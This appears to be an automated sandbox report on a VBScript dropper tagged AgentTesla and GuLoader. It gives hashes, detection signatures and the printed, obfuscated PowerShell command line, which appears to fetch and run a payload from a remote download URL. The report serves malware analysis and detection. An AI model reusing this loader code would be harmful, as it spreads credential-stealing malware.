Edit tour
Windows
Analysis Report
justificant de transfer#U00e8ncia.vbs
Overview
General Information
| Sample name: | justificant de transfer#U00e8ncia.vbsrenamed because original name is a hash value |
| Original sample name: | justificant de transferncia.vbs |
| Analysis ID: | 1427932 |
| MD5: | 6d2f93878e625759f49553c5f971ddc9 |
| SHA1: | bf821caba21c6786fb3c0657259fa9e6fa09aace |
| SHA256: | b6938d3e36a7d58523cd80f095f36593e0de47fe6d65dd74e5e91c0719a3849c |
| Tags: | AgentTeslaGuLoadervbs |
| Infos: |   |
 | |
Detection
| Score: | 96 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 4836 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\justi ficant de transfer#U 00e8ncia.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7180 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Skraanin gsvinklen = 1;$Fotog rafiappara ternes202= 'Substrin' ;$Fotograf iapparater nes202+='g ';Function Baroclini city($Genf orenende){ $Piccoloer ne=$Genfor enende.Len gth-$Skraa ningsvinkl en;For($Va inness=5; $Vainness -lt $Picco loerne; $V ainness+=( 6)){$Flytt ende+=$Gen forenende. $Fotografi apparatern es202.Invo ke($Vainne ss, $Skraa ningsvinkl en);}$Flyt tende;}fun ction para sols($Dugp unkts){. ($isska bes) ($Dug punkts);}$ Strandedne ss=Barocli nicity 'Ag e eMMicroo Syd,rzTher miToftmlS lenlMarp,a Mak /Rele v5Samov.Bl ood0 fte T hol( efolW TeltiD ar fnAnk.nd B agsoCampiw G,debsOmni p Fo laNBr ndsTGgele Stikh1 S,u d0frang. K ond0Thoke; ,aptu Rumg uWKoalii,a rpenMongr6 Lu,s4 .nd e;Sexua Un derxGejrp6 Tou,n4 Mid w;Dista Ma lmrVisitv, teto:Hykle 1Dryad2 Ha rd1Cysto.C lupe0Prcis ) boga Lab orGEneboeC henicBurea k Clemo Ga ng/Flgev2S m.at0Dsles 1 nnih0 Ri bn0oxli,1 T.ag0Etape 1 Otm emu lFDataliHa stur Blite MiscofOver boSalgsx u lph/ ,her1 Decim2 Ber o1A,ieh.Th ras0Opstt ';$Budgetf orslags=Ba roclinicit y 'VelseUB lurssBrnep eForlgrhar mo-SaddeAB efrugDeso, eSneglnQua trtDilog ' ;$Programb iblioteker ne=Barocli nicity 'In famhBrygmt DisptFlue spUlovmsTy peh: ,thi/ Narco/Und rdRenour H el,i skftv DetieFrin g.MaanegRv erko orkao Princg fem vlBrazie , rof. Pro,c FlertoC,bu rm K ge/Se kunuTska.c Sekre? kri teUnstaxFo redp Vando SealrInd. at dspa= R anud Tykmo Stru w.las knNa lsl H attoSu,cea LibiddSmit t&HippoiVa n hdAbsin= Infor1Ra k oSH.ktiEb. lavG Prunc Dis iwK,ll eB HanlcDe terOSpaliP TodiduIntr .C Bldg6Be fliM,tipu5 Subscv atu rD AlimjPr imukAnnekN HandXRagi uiHovedP D raczSvinga RetrtZPa,k toConcezme ga.dConsiU StowbePrse n2 NdriwRa en. ';$Non inductivel y=Baroclin icity 'Ube h.>C.rap ' ;$isskabes =Baroclini city ' oso niTagryeB lstxCha,l ';$Leisjes = Barocli nicity 'se jtreFristc ,olihEndo ,oYemel St eff%Anti.a MinicpSpin dpSluggdRe sida Suivt SoundaDagc e%Burkg\He magCTalrko W mbwl.oth eoOvergusm rgarbaadfa Yamst nde riFoolsoAl eu,n Call. Zool.AMero gfMapuchDo nk, Belor& Welte&Uhla n EndeveTi l.ucRustlh Webe.o Pre d Post$Sag ge ';paras ols (Baroc linicity ' Victu$Skrp eg FrivlIn duso Omstb eks.ma Neo llBe.kn:Le velP,evier ,llano,ivi sgUnregrTh undaAlumim ,agfjmCyto seSkinnrRe tu.iChicon We,trgLo d osPreovm,s bryaH,ilke Ej rssEski lsColliiUn actgNedlu= Borto(Ud,m ecRentemr, ckid Styr S,ati/geor gc E.gy Ov ert$DispeL SweeteGesa nihoneysAe sirjFr,ese Equa,sSerr ,)saliv ') ;parasols (Baroclini city 'Enga n$SpilugSo rdal .mmeo ErhvebT ap paDamp,l P art: ackhA D spivColu meF nden r ettiTungnn B lr=Hach i$ Se uPEr lggrLivero mpongRegi orTzotzaCo lismBenefb